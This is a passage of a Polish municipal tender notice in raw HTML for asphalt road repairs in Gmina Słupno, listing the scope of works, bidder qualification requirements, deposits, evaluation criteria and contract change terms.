mineralno-asfaltowej dziennie przewidzianej dla powyższego zakresu.Opis robótRoboty obejmują cięcie piłą mechaniczną nawierzchni asfaltowej na średnią głębokość 6cm. Wykonanie koryta pod warstwy konstrukcyjne, uzupełnienie przy pomocy kruszywa kamiennego (mieszanka optymalna) frakcji 0/31,5 z kamienia dolomitowego, polnego, gabro lub innych posiadających dokument dopuszczający do stosowania w budownictwie oraz zagęszczenie przy pomocy zagęszczarki płytowej lub stopy wibracyjnej. Zamawiający nie dopuszcza stosowania kruszywa z kamienia wapiennego. Skropienie warstwy podbudowy oraz krawędzi emulsją asfaltową.Ułożenie warstwy asfaltu o średniej grubości 4cm po zagęszczeniu oraz zagęszczenie walcem. Warstwa ścieralna powinna nawiązywać wysokościowo do istniejącej nawierzchni bitumicznej. Powinna być odpowiednio wyprofilowana oraz posiadać spadki umożliwiające spływ powierzchniowy wód opadowych.Uszczelnienie połączenia przy pomocy emulsji asfaltowej oraz grysu bazaltowego.Zakres robótZakres robót obejmuje utrzymanie dróg w okresie od daty podpisania umowy do 30.06.2019r. Zamawiający przewiduje następujące ulice na terenie gminy do naprawy ubytków w nawierzchni bitumicznej: Szeligi - 1 800m2:o	Droga nr 291209W - ca 1800m2.Sambórz - 2 700m2o	Droga nr 291207W - ca 2700m2.Co stanowi 4 500 m2 dróg i ulic przeznaczonych do naprawy ubytków w nawierzchni bitumicznej na terenie Gminy Słupno.Rozliczenie robótRozliczenie robót nastąpi po dokonaniu obmiaru wykonanych robót w m2 potwierdzonych przez inspektora nadzoru lub uprawnionego pracownika Urzędu Gminy protokołem odbioru. Prawidłowo wypełniony protokół odbioru stanowi podstawę do wystawienia faktury. Zamawiający przewiduje rozliczenie na podstawie protokołów i faktur składanych nie częściej niż jeden raz w miesiącu. </span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">45000000-7</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia"></span> <br /> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w miesiącach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w dniach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data rozpoczęcia</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data zakończenia</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'> </TD><TD style='border: 1px solid black;border-collapse: collapse;'>2019-09-15</TD></TR></TABLE> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">zamawiający nie określa wymagań w tym zakresie</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">zamawiający nie określa wymagań w tym zakresie</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">Zamawiający wymaga:a) dla części 1 - aby wykonawca wykonał w okresie ostatnich 5 lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - co najmniej 1 zamówienie polegające na budowie lub przebudowie lub rozbudowie lub remoncie drogi o powierzchni minimum 3.000,00m2,b) dla części 2 - aby wykonawca wykonał w okresie ostatnich 5 lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - co najmniej 1 zamówienie polegające na budowie lub przebudowie lub rozbudowie lub remoncie drogi o powierzchni minimum 10.000,00m2,c) dla części 3 - aby wykonawca wykonał w okresie ostatnich 5 lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - co najmniej 1 zamówienie polegające na budowie lub przebudowie lub rozbudowie lub remoncie drogi o powierzchni minimum 17.000,00m2,d) dla części 4 - aby wykonawca wykonał w okresie ostatnich 5 lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - co najmniej 1 zamówienie polegające na budowie lub przebudowie lub rozbudowie lub remoncie drogi o powierzchni minimum 3.000,00m2,</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Nie</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen"></span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">1) Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - inne dokumenty.</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">1) Dowód wniesienia wadium - jeżeli jest w formie innej niż pieniężna,2) Pełnomocnictwo /oryginał/ osoby lub osób podpisujących ofertę - jeżeli uprawnienie do podpisu nie wynika bezpośrednio z załączonych dokumentów,3) W przypadku złożenia oferty wspólnej - pełnomocnictwo udzielone liderowi,4) Zobowiązanie podmiotu trzeciego - Załącznik nr 3 (jeżeli dotyczy).</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Tak</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium">Wykonawca przystępując do przetargu jest zobowiązany wnieść wadium w wysokości: - dla części 1 : 3.000,00 zł (słownie: trzy tysiące złotych),- dla części 2: 8.000,00 zł (słownie: osiem tysięcy złotych),- dla części 3: 1.700,00zł (słownie: jeden tysiąc siedemset złotych),- dla części 4 : 1.000,00zł (słownie: jeden tysiąc złotych),do upływu terminu składania ofert.Wykonawca składając ofertę na więcej niż jedną część, wnosi wadium odpowiednio dla każdej z nich. </span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej">Nie</span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Gwarancja</TD><TD style='border: 1px solid black;border-collapse: collapse;'>40,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">Zamawiający dopuszcza zmiany umowy w przypadkach określonych w art. 144 ust. 1pkt 2 - 6 Prawa Zamówień Publicznych oraz przewiduje możliwość dokonania w umowie następujących istotnych zmian:a) wynagrodzenia w przypadku ustawowej zmiany podatku VAT, b) wynagrodzenia w przypadku wystąpienia robót zamiennych i/lub zaniechanych, i/lub dodatkowych, c) terminu wykonania przedmiotu umowy w przypadku zlecenia wykonania robót, o których mowa w § 5 ust. 9, 10 lub 11, terminu wykonania przedmiotu umowy w przypadku zaistnienia sytuacji, o których mowa w § 3 ust. 2 oraz w przypadku zmiany umowy dokonanej zgodnie z art. 144 ust. 1 pkt 3 lub 6,d) terminu wykonania przedmiotu umowy w przypadku zaistnienia działań wojennych, aktów terroryzmu, rewolucji, przewrotu wojskowego lub cywilnego, wojny domowej, skażeń radioaktywnych, z wyjątkiem tych które mogą być spowodowane użyciem ich przez wykonawcę,e) terminu wykonania w przypadku zaistnienia klęski żywiołowej, jak huragany, powodzie, trzęsienie ziemi, bunty, niepokoje, strajki, okupacje budowy przez osoby inne niż pracownicy wykonawcy i jego podwykonawców,f) treści § 7 ust. 2 dotyczących wpisania lub zmiany zakresu podwykonawstwa wprzypadku gdy Wykonawca dokona prawidłowego zgłoszenia lub zmiany podwykonawców w zakresie zgodnym ze SIWZ, umową.g) terminu wykonania w przypadku wystąpienia konieczności przeprowadzenia nieprzewidzianych uzgodnień technicznych, wstrzymania budowy przez właściwy organ z przyczyn nie zawinionych przez Wykonawcę (np. odkryciu niewybuchu), wystąpienia przedłużenia się okresu osiągania parametrów technologicznych nie zawinionego przez Wykonawcę. Inicjatorem zmiany może być zarówno Zamawiający jak i Wykonawca. Zmiana wymaga zgłoszenia w formie pisemnej w ciągu 5 dni roboczych od powzięcia informacji stanowiącej podstawę do wprowadzenia zmian. Zmiana ta może spowodować zmianę terminu wykonania prac i nie spowoduje zmiany wynagrodzenia Wykonawcy. </span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2019-05-14</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">09:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki"></span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od 